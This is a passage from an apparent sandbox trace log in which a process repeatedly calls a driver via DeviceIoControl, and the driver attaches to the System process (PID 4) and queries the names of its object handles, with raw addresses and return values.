PROCESS=0xffffe00067e72040, ApcState=0xffffd000ac0cf400) [0288.935] ObReferenceObjectByHandle (in: Handle=0xffffffff80000b20, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x0, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe00069decb70, HandleInformation=0x0) returned 0x0 [0288.935] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0288.936] PsReleaseProcessExitSynchronization () returned 0x2 [0288.936] ObfDereferenceObject (Object=0xffffe00067e72040) returned 0x2f859 [0288.936] ObQueryNameString (in: Object=0xffffe00069decb70, ObjectNameInfo=0xffffe0006a2a0044, Length=0x800, ReturnLength=0xffffd000ac0cf380 | out: ObjectNameInfo=0xffffe0006a2a0044, ReturnLength=0xffffd000ac0cf380) returned 0x0 [0288.936] ObfDereferenceObject (Object=0xffffe00069decb70) returned 0x7fff [0288.936] IoCompleteRequest () returned 0x0 [0288.936] DeviceIoControl (in: hDevice=0x14c, dwIoControlCode=0x83350048, lpInBuffer=0x14d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2810f0, nOutBufferSize=0x808, lpBytesReturned=0x14d450, lpOverlapped=0x0 | out: lpInBuffer=0x14d4c8*, lpOutBuffer=0x2810f0*, lpBytesReturned=0x14d450*=0x20, lpOverlapped=0x0) returned 1 [0288.936] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0288.936] PsAcquireProcessExitSynchronization () returned 0x0 [0288.936] KeStackAttachProcess (in: PROCESS=0xffffe00067e72040, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe00067e72040, ApcState=0xffffd000ac0cf400) [0288.936] ObReferenceObjectByHandle (in: Handle=0xffffffff80000b28, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x0, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe0006a663570, HandleInformation=0x0) returned 0x0 [0288.936] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0288.936] PsReleaseProcessExitSynchronization () returned 0x2 [0288.936] ObfDereferenceObject (Object=0xffffe00067e72040) returned 0x2f858 [0288.936] ObQueryNameString (in: Object=0xffffe0006a663570, ObjectNameInfo=0xffffe0006a4f07c4, Length=0x800, ReturnLength=0xffffd000ac0cf380 | out: ObjectNameInfo=0xffffe0006a4f07c4, ReturnLength=0xffffd000ac0cf380) returned 0x0 [0288.936] ObfDereferenceObject (Object=0xffffe0006a663570) returned 0x7fff [0288.936] IoCompleteRequest () returned 0x0 [0288.936] DeviceIoControl (in: hDevice=0x14c, dwIoControlCode=0x83350048, lpInBuffer=0x14d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2810f0, nOutBufferSize=0x808, lpBytesReturned=0x14d450, lpOverlapped=0x0 | out: lpInBuffer=0x14d4c8*, lpOutBuffer=0x2810f0*, lpBytesReturned=0x14d450*=0x20, lpOverlapped=0x0) returned 1 [0288.936] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0288.936] PsAcquireProcessExitSynchronization () returned 0x0 [0288.936] KeStackAttachProcess (in: PROCESS=0xffffe00067e72040, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe00067e72040, ApcState=0xffffd000ac0cf400) [0288.936] ObReferenceObjectByHandle (in: Handle=0xffffffff80000b60, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x0, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe0006a8957b0, HandleInformation=0x0) returned 0x0 [0288.936] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0288.936] PsReleaseProcessExitSynchronization () returned 0x2 [0288.936] ObfDereferenceObject (Object=0xffffe00067e72040) returned 0x2f857 [0288.936] ObQueryNameString (in: Object=0xffffe0006a8957b0, ObjectNameInfo=0xffffe0006a2c5044, Length=0x800, ReturnLength=0xffffd000ac0cf380 | out: ObjectNameInfo=0xffffe0006a2c5044, ReturnLength=0xffffd000ac0cf380) returned 0x0 [0288.936] ObfDereferenceObject (Object=0xffffe0006a8957b0) returned 0x7fff [0288.936] IoCompleteRequest () returned 0x0 [0288.936] DeviceIoControl (in: hDevice=0x14c, dwIoControlCode=0x83350048, lpInBuffer=0x14d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2810f0, nOutBufferSize=0x808, lpBytesReturned=0x14d450, lpOverlapped=0x0 | out: lpInBuffer=0x14d4c8*, lpOutBuffer=0x2810f0*, lpBytesReturned=0x14d450*=0x7e, lpOverlapped=0x0) returned 1 [0288.936] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0288.936] PsAcquireProcessExitSynchronization () returned 0x0 [0288.936] KeStackAttachProcess (in: PROCESS=0xffffe00067e72040, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe00067e72040, ApcState=0xffffd000ac0cf400) [0288.936] ObReferenceObjectByHandle (in: Handle=0xffffffff80000b74, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x0, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe000691274e0, HandleInformation=0x0) returned 0x0 [0288.936] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0288.936] PsReleaseProcessExitSynchronization () returned 0x2 [0288.936] ObfDereferenceObject (Object=0xffffe00067e72040) returned 0x2f856 [0288.936] ObQueryNameString (in: Object=0xffffe000691274e0, ObjectNameInfo=0xffffe0006a2a5044, Length=0x800, ReturnLength=0xffffd000ac0cf380 | out: ObjectNameInfo=0xffffe0006a2a5044, ReturnLength=0xffffd000ac0cf380) returned 0x0 [0288.936] ObfDereferenceObject (Object=0xffffe000691274e0) returned 0x7fff [0288.936] IoCompleteRequest () returned 0x0 [0288.936] DeviceIoControl (in: hDevice=0x14c, dwIoControlCode=0x83350048, lpInBuffer=0x14d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2810f0, nOutBufferSize=0x808, lpBytesReturned=0x14d450, lpOverlapped=0x0 | out: lpInBuffer=0x14d4c8*, lpOutBuffer=0x2810f0*, lpBytesReturned=0x14d450*=0x20, lpOverlapped=0x0) returned 1 [0288.936] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0288.936] PsAcquireProcessExitSynchronization () returned 0x0 [0288.937] KeStackAttachProcess (in: PROCESS=0xffffe00067e72040, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe00067e72040, ApcState=0xffffd000ac0cf400) [0288.937] ObReferenceObjectByHandle (in: Handle=0xffffffff80000ba8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x0, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe0006a722070, HandleInformation=0x0) returned 0x0 [0288.937] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0288.937] PsReleaseProcessExitSynchronization () returned 0x2 [0288.937] ObfDereferenceObject (Object=0xffffe00067e72040) returned 0x2f855 [0288.937] ObQueryNameString (in: Object=0xffffe0006a722070, ObjectNameInfo=0xffffe0006a9be044, Length=0x800, ReturnLength=0xffffd000ac0cf380 | out: ObjectNameInfo=0xffffe0006a9be044, ReturnLength=0xffffd000ac0cf380) returned 0x0 [0288.937] ObfDereferenceObject (Object=0xffffe0006a722070) returned 0x7fff [0288.937] IoCompleteRequest () returned 0x0 [0288.937] DeviceIoControl (in: hDevice=0x14c, dwIoControlCode=0x83350048, lpInBuffer=0x14d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2810f0, nOutBufferSize=0x808, lpBytesReturned=0x14d450, lpOverlapped=0x0 | out: lpInBuffer=0x14d4c8*, lpOutBuffer=0x2810f0*, lpBytesReturned=0x14d450*=0x7e, lpOverlapped=0x0) returned 1 [0288.937] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0288.937] PsAcquireProcessExitSynchronization () returned 0x0 [0288.937] KeStackAttachProcess (in: PROCESS=0xffffe00067e72040, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe00067e72040, ApcState=0xffffd000ac0cf400) [0288.937] ObReferenceObjectByHandle (in: Handle=0xffffffff80000be4, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x0, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe00069208850, HandleInformation=0x0) returned 0x0 [0288.937] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0288.937] PsReleaseProcessExitSynchronization () returned 0x2 [0288.937] ObfDereferenceObject (Object=0xffffe00067e72040) returned 0x2f854 [0288.937] ObQueryNameString (in: Object=0xffffe00069208850, ObjectNameInfo=0xffffe0006a6a57c4, Length=0x800, ReturnLength=0xffffd000ac0cf380 | out: ObjectNameInfo=0xffffe0006a6a57c4, ReturnLength=0xffffd000ac0cf380) returned 0x0 [0288.937] ObfDereferenceObject (Object=0xffffe00069208850) returned 0x7fff [0288.937] IoCompleteRequest () returned 0x0 [0288.937] DeviceIoControl (in: hDevice=0x14c, dwIoControlCode=0x83350048, lpInBuffer=0x14d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2810f0, nOutBufferSize=0x808, lpBytesReturned=0x14d450, lpOverlapped=0x0 | out: lpInBuffer=0x14d4c8*, lpOutBuffer=0x2810f0*, lpBytesReturned=0x14d450*=0x7e, lpOverlapped=0x0) returned 1 [0288.937] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0288.937] PsAcquireProcessExitSynchronization () returned 0x0 [0288.937] KeStackAttachProcess (in: PROCESS=0xffffe00067e72040, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe00067e72040, ApcState=0xffffd000ac0cf400) [0288.937] ObReferenceObjectByHandle (in: Handle=0xffffffff80000be8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x0, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe00069159560, HandleInformation=0x0) returned 0x0 [0288.937] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0288.937] PsReleaseProcessExitSynchronization () returned 0x2 [0288.937] ObfDereferenceObject (Object=0xffffe00067e72040) returned 0x2f853 [0288.937] ObQueryNameString (in: Object=0xffffe00069159560, ObjectNameInfo=0xffffe00069f22044, Length=0x800, ReturnLength=0xffffd000ac0cf380 | out: ObjectNameInfo=0xffffe00069f22044, ReturnLength=0xffffd000ac0cf380) returned 0x0 [0288.937] ObfDereferenceObject (Object=0xffffe00069159560) returned 0x7fff [0288.937] IoCompleteRequest () returned 0x0 [0288.937] DeviceIoControl (in: hDevice=0x14c, dwIoControlCode=0x83350048, lpInBuffer=0x14d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2810f0, nOutBufferSize=0x808, lpBytesReturned=0x14d450, lpOverlapped=0x0 | out: lpInBuffer=0x14d4c8*, lpOutBuffer=0x2810f0*, lpBytesReturned=0x14d450*=0xcc, lpOverlapped=0x0) returned 1 [0288.937] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0288.937] PsAcquireProcessExitSynchronization () returned 0x0 [0288.937] KeStackAttachProcess (in: PROCESS=0xffffe00067e72040, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe00067e72040, ApcState=0xffffd000ac0cf400) [0288.937] ObReferenceObjectByHandle (in: Handle=0xffffffff80000c60, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x0, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe000695043a0, HandleInformation=0x0) returned 0x0 [0288.937] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0288.937] PsReleaseProcessExitSynchronization () returned 0x2 [0288.937] ObfDereferenceObject (Object=0xffffe00067e72040) returned 0x2f852 [0288.937] ObQueryNameString (in: Object=0xffffe000695043a0, ObjectNameInfo=0xffffe0006a4f5044, Length=0x800, ReturnLength=0xffffd000ac0cf380 | out: ObjectNameInfo=0xffffe0006a4f5044, ReturnLength=0xffffd000ac0cf380) returned 0x0 [0289.363] ObfDereferenceObject (Object=0xffffe000695043a0) returned 0x0 [0289.363] IoCompleteRequest () returned 0x0 [0289.363] DeviceIoControl (in: hDevice=0x14c, dwIoControlCode=0x83350048, lpInBuffer=0x14d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2810f0, nOutBufferSize=0x808, lpBytesReturned=0x14d450, lpOverlapped=0x0 | out: lpInBuffer=0x14d4c8*, lpOutBuffer=0x2810f0*, lpBytesReturned=0x14d450*=0x7e, lpOverlapped=0x0) returned 1 [0289.363] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0289.363] PsAcquireProcessExitSynchronization () returned 0x0 [0289.363] KeStackAttachProcess (in: PROCESS=0xffffe00067e72040, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe00067e72040, ApcState=0xffffd000ac0cf400) [0289.363] ObReferenceObjectByHandle (in: Handle=0xffffffff80000c6c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x0, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe00069167560, HandleInformation=0x0) returned 0x0 [0289.363] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0289.363] PsReleaseProcessExitSynchronization () returned 0x2 [0289.363] ObfDereferenceObject (Object=0xffffe00067e72040) returned 0x2f851 [0289.363] ObQueryNameString (in: Object=0xffffe00069167560, ObjectNameInfo=0xffffe000692bf7c4, Length=0x800, ReturnLength=0xffffd000ac0cf380 | out: ObjectNameInfo=0xffffe000692bf7c4, ReturnLength=0xffffd000ac0cf380) returned 0x0 [0289.363] ObfDereferenceObject (Object=0xffffe00069167560) returned 0x7fff [0289.363] IoCompleteRequest () returned 0x0 [0289.363] DeviceIoControl (in: hDevice=0x14c, dwIoControlCode=0x83350048, lpInBuffer=0x14d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2810f0, nOutBufferSize=0x808, lpBytesReturned=0x14d450, lpOverlapped=0x0 | out: lpInBuffer=0x14d4c8*, lpOutBuffer=0x2810f0*, lpBytesReturned=0x14d450*=0x2c, lpOverlapped=0x0) returned 1 [0289.363] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0289.363] PsAcquireProcessExitSynchronization () returned 0x0 [0289.363] KeStackAttachProcess (in: PROCESS=0xffffe00067e72040, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe00067e72040, ApcState=0xffffd000ac0cf400) [0289.363] ObReferenceObjectByHandle (in: Handle=0xffffffff80000c70, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x0, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe00069153790, HandleInformation=0x0) returned 0x0 [0289.363] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0289.363] PsReleaseProcessExitSynchronization () returned 0x2 [0289.363] ObfDereferenceObject (Object=0xffffe00067e72040) returned 0x2f850 [0289.363] ObQueryNameString (in: Object=0xffffe00069153790, ObjectNameInfo=0xffffe0006a610704, Length=0x800, ReturnLength=0xffffd000ac0cf380 | out: ObjectNameInfo=0xffffe0006a610704, ReturnLength=0xffffd000ac0cf380) returned 0x0 [0289.363] ObfDereferenceObject (Object=0xffffe00069153790) returned 0x7fff [0289.363] IoCompleteRequest () returned 0x0 [0289.364] DeviceIoControl (in: hDevice=0x14c, dwIoControlCode=0x83350048, lpInBuffer=0x14d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2810f0, nOutBufferSize=0x808, lpBytesReturned=0x14d450, lpOverlapped=0x0 | out: lpInBuffer=0x14d4c8*, lpOutBuffer=0x2810f0*, lpBytesReturned=0x14d450*=0x1a8, lpOverlapped=0x0) returned 1 [0289.364] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0289.364] PsAcquireProcessExitSynchronization () returned 0x0 [0289.364] KeStackAttachProcess (in: PROCESS=0xffffe00067e72040, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe00067e72040, ApcState=0xffffd000ac0cf400) [0289.364] ObReferenceObjectByHandle (in: Handle=0xffffffff80000c8c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x0, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe0006a0bf950, HandleInformation=0x0) returned 0x0 [0289.364] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0289.364] PsReleaseProcessExitSynchronization () returned 0x2 [0289.364] ObfDereferenceObject (Object=0xffffe00067e72040) returned 0x2f84f [0289.364] ObQueryNameString (in: Object=0xffffe00069086c90, ObjectNameInfo=0xffffe0006a5bc7c4, Length=0x800, ReturnLength=0xffffd000ac0cf338 | out: ObjectNameInfo=0xffffe0006a5bc7c4, ReturnLength=0xffffd000ac0cf338) returned 0x0 [0289.364] ObfDereferenceObject (Object=0xffffe0006a0bf950) returned 0x7f42 [0289.364] IoCompleteRequest () returned 0x0 [0289.364] DeviceIoControl (in: hDevice=0x14c, dwIoControlCode=0x83350048, lpInBuffer=0x14d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2810f0, nOutBufferSize=0x808, lpBytesReturned=0x14d450, lpOverlapped=0x0 | out: lpInBuffer=0x14d4c8*, lpOutBuffer=0x2810f0*, lpBytesReturned=0x14d450*=0x7e, lpOverlapped=0x0) returned 1 [0289.364] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0289.364] PsAcquireProcessExitSynchronization () returned 0x0 [0289.364] KeStackAttachProcess (in: PROCESS=0xffffe00067e72040, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe00067e72040, ApcState=0xffffd000ac0cf400) [0289.364] ObReferenceObjectByHandle (in: Handle=0xffffffff80000c98, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x0, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe000691b7630, HandleInformation=0x0) returned 0x0 [0289.364] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0289.364] PsReleaseProcessExitSynchronization () returned 0x2 [0289.364] ObfDereferenceObject (Object=0xffffe00067e72040) returned 0x2f84e [0289.364] ObQueryNameString (in: Object=0xffffe000691b7630, ObjectNameInfo=0xffffe0006904d7c4, Length=0x800, ReturnLength=0xffffd000ac0cf380 | out: ObjectNameInfo=0xffffe0006904d7c4, ReturnLength=0xffffd000ac0cf380) returned 0x0 [0289.364] ObfDereferenceObject (Object=0xffffe000691b7630) returned 0x7fff [0289.364] IoCompleteRequest () returned 0x0 [0289.364] DeviceIoControl (in: hDevice=0x14c, dwIoControlCode=0x83350048, lpInBuffer=0x14d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2810f0, nOutBufferSize=0x808, lpBytesReturned=0x14d450, lpOverlapped=0x0 | out: lpInBuffer=0x14d4c8*, lpOutBuffer=0x2810f0*, lpBytesReturned=0x14d450*=0x20, lpOverlapped=0x0) returned 1 [0289.364] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0289.364] PsAcquireProcessExitSynchronization () returned 0x0 [0289.364] KeStackAttachProcess (in: PROCESS=0xffffe00067e72040, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe00067e72040, ApcState=0xffffd000ac0cf400) [0289.364] ObReferenceObjectByHandle (in: Handle=0xffffffff80000ca4, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x0, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe0006a5612f0, HandleInformation=0x0) returned 0x0 [0289.364] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0289.364] PsReleaseProcessExitSynchronization () returned 0x2 [0289.364] ObfDereferenceObject (Object=0xffffe00067e72040) returned 0x2f84d [0289.364] ObQueryNameString (in: Object=0xffffe0006a5612f0, ObjectNameInfo=0xffffe0006a3e57c4, Length=0x800, ReturnLength=0xffffd000ac0cf380 | out: ObjectNameInfo=0xffffe0006a3e57c4, ReturnLength=0xffffd000ac0cf380) returned 0x0 [0289.364] ObfDereferenceObject (Object=0xffffe0006a5612f0) returned 0x7fff [0289.364] IoCompleteRequest () returned 0x0 [0289.364] DeviceIoControl (in: hDevice=0x14c, dwIoControlCode=0x83350048, lpInBuffer=0x14d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2810f0, nOutBufferSize=0x808, lpBytesReturned=0x14d450, lpOverlapped=0x0 | out: lpInBuffer=0x14d4c8*, lpOutBuffer=0x2810f0*, lpBytesReturned=0x14d450*=0x7e, lpOverlapped=0x0) returned 1 [0289.364] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0289.364] PsAcquireProcessExitSynchronization () returned 0x0 [0289.364] KeStackAttachProcess (in: PROCESS=0xffffe00067e72040, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe00067e72040, ApcState=0xffffd000ac0cf400) [0289.364] ObReferenceObjectByHandle (in: Handle=0xffffffff80000cac, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x0, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe00069352ae0, HandleInformation=0x0) returned 0x0 [0289.365] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0289.365] PsReleaseProcessExitSynchronization () returned 0x2 [0289.365] ObfDereferenceObject (Object=0xffffe00067e72040) returned 0x2f84c [0289.365] ObQueryNameString (in: Object=0xffffe00069352ae0, ObjectNameInfo=0xffffe0006a2a0044, Length=0x800, ReturnLength=0xffffd000ac0cf380 | out: ObjectNameInfo=0xffffe0006a2a0044, ReturnLength=0xffffd000ac0cf380) returned 0x0 [0289.365] ObfDereferenceObject (Object=0xffffe00069352ae0) returned 0x7fff [0289.365] IoCompleteRequest () returned 0x0 [0289.365] DeviceIoControl (in: hDevice=0x14c, dwIoControlCode=0x83350048, lpInBuffer=0x14d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2810f0, nOutBufferSize=0x808, lpBytesReturned=0x14d450, lpOverlapped=0x0 | out: lpInBuffer=0x14d4c8*, lpOutBuffer=0x2810f0*, lpBytesReturned=0x14d450*=0x7e, lpOverlapped=0x0) returned 1 [0289.365] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0289.365] PsAcquireProcessExitSynchronization () returned 0x0 [0289.365] KeStackAttachProcess (in: PROCESS=0xffffe00067e72040, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe00067e72040, ApcState=0xffffd000ac0cf400) [0289.365] ObReferenceObjectByHandle (in: Handle=0xffffffff80000cc4, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x0, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe000691143c0, HandleInformation=0x0) returned 0x0 [0289.365] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0289.365] PsReleaseProcessExitSynchronization () returned 0x2 [0289.365] ObfDereferenceObject (Object=0xffffe00067e72040) returned 0x2f84b [0289.365] ObQueryNameString (in: Object=0xffffe000691143c0, ObjectNameInfo=0xffffe0006a4f07c4, Length=0x800, ReturnLength=0xffffd000ac0cf380 | out: ObjectNameInfo=0xffffe0006a4f07c4, ReturnLength=0xffffd000ac0cf380) returned 0x0 [0289.365] ObfDereferenceObject (Object=0xffffe000691143c0) returned 0x7fff [0289.365] IoCompleteRequest () returned 0x0 [0289.365] DeviceIoControl (in: hDevice=0x14c, dwIoControlCode=0x83350048, lpInBuffer=0x14d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2810f0, nOutBufferSize=0x808, lpBytesReturned=0x14d450, lpOverlapped=0x0 | out: lpInBuffer=0x14d4c8*, lpOutBuffer=0x2810f0*, lpBytesReturned=0x14d450*=0x20, lpOverlapped=0x0) returned 1 [0289.365] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0289.365] PsAcquireProcessExitSynchronization () returned 0x0 [0289.365] KeStackAttachProcess (in: PROCESS=0xffffe00067e72040, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe00067e72040, ApcState=0xffffd000ac0cf400) [0289.365] ObReferenceObjectByHandle (in: Handle=0xffffffff80000ccc, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x0, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe0006a32c3e0, HandleInformation=0x0) returned 0x0 [0289.365] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0289.365] PsReleaseProcessExitSynchronization () returned 0x2 [0289.365] ObfDereferenceObject (Object=0xffffe00067e72040) returned 0x2f84a [0289.365] ObQueryNameString (in: Object=0xffffe0006a32c3e0, ObjectNameInfo=0xffffe0006a2c5044, Length=0x800, ReturnLength=0xffffd000ac0cf380 | out: ObjectNameInfo=0xffffe0006a2c5044, ReturnLength=0xffffd000ac0cf380) returned 0x0 [0289.365] ObfDereferenceObject (Object=0xffffe0006a32c3e0) returned 0x7fff [0289.365] IoCompleteRequest () returned 0x0 [0289.365] DeviceIoControl (in: hDevice=0x14c, dwIoControlCode=0x83350048, lpInBuffer=0x14d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2810f0, nOutBufferSize=0x808, lpBytesReturned=0x14d450, lpOverlapped=0x0 | out: lpInBuffer=0x14d4c8*, lpOutBuffer=0x2810f0*, lpBytesReturned=0x14d450*=0x7e, lpOverlapped=0x0) returned 1 [0289.365] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0289.365] PsAcquireProcessExitSynchronization () returned 0x0 [0289.365] KeStackAttachProcess (in: PROCESS=0xffffe00067e72040, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe00067e72040, ApcState=0xffffd000ac0cf400) [0289.365] ObReferenceObjectByHandle (in: Handle=0xffffffff80000cd4, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x0, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe000691083c0, HandleInformation=0x0) returned 0x0 [0289.365] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0289.365] PsReleaseProcessExitSynchronization () returned 0x2 [0289.365] ObfDereferenceObject (Object=0xffffe00067e72040) returned 0x2f849 [0289.365] ObQueryNameString (in: Object=0xffffe000691083c0, ObjectNameInfo=0xffffe0006a2a5044, Length=0x800, ReturnLength=0xffffd000ac0cf380 | out: ObjectNameInfo=0xffffe0006a2a5044, ReturnLength=0xffffd000ac0cf380) returned 0x0 [0289.365] ObfDereferenceObject (Object=0xffffe000691083c0) returned 0x7fff [0289.365] IoCompleteRequest () returned 0x0 [0289.365] DeviceIoControl (in: hDevice=0x14c, dwIoControlCode=0x83350048, lpInBuffer=0x14d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2810f0, nOutBufferSize=0x808, lpBytesReturned=0x14d450, lpOverlapped=0x0 | out: lpInBuffer=0x14d4c8*, lpOutBuffer=0x2810f0*, lpBytesReturned=0x14d450*=0x7e, lpOverlapped=0x0) returned 1 [0289.365] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0289.366] PsAcquireProcessExitSynchronization () returned 0x0 [0289.366] KeStackAttachProcess (in: PROCESS=0xffffe00067e72040, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe00067e72040, ApcState=0xffffd000ac0cf400) [0289.366] ObReferenceObjectByHandle (in: Handle=0xffffffff80000ce8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x0, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe00069104270, HandleInformation=0x0) returned 0x0 [0289.366] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0289.366] PsReleaseProcessExitSynchronization () returned 0x2 [0289.366] ObfDereferenceObject (Object=0xffffe00067e72040) returned 0x2f848 [0289.366] ObQueryNameString (in: Object=0xffffe00069104270, ObjectNameInfo=0xffffe0006a9be044, Length=0x800, ReturnLength=0xffffd000ac0cf380 | out: ObjectNameInfo=0xffffe0006a9be044, ReturnLength=0xffffd000ac0cf380) returned 0x0 [0289.366] ObfDereferenceObject (Object=0xffffe00069104270) returned 0x7fff [0289.366] IoCompleteRequest () returned 0x0 [0289.366] DeviceIoControl (in: hDevice=0x14c, dwIoControlCode=0x83350048, lpInBuffer=0x14d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2810f0, nOutBufferSize=0x808, lpBytesReturned=0x14d450, 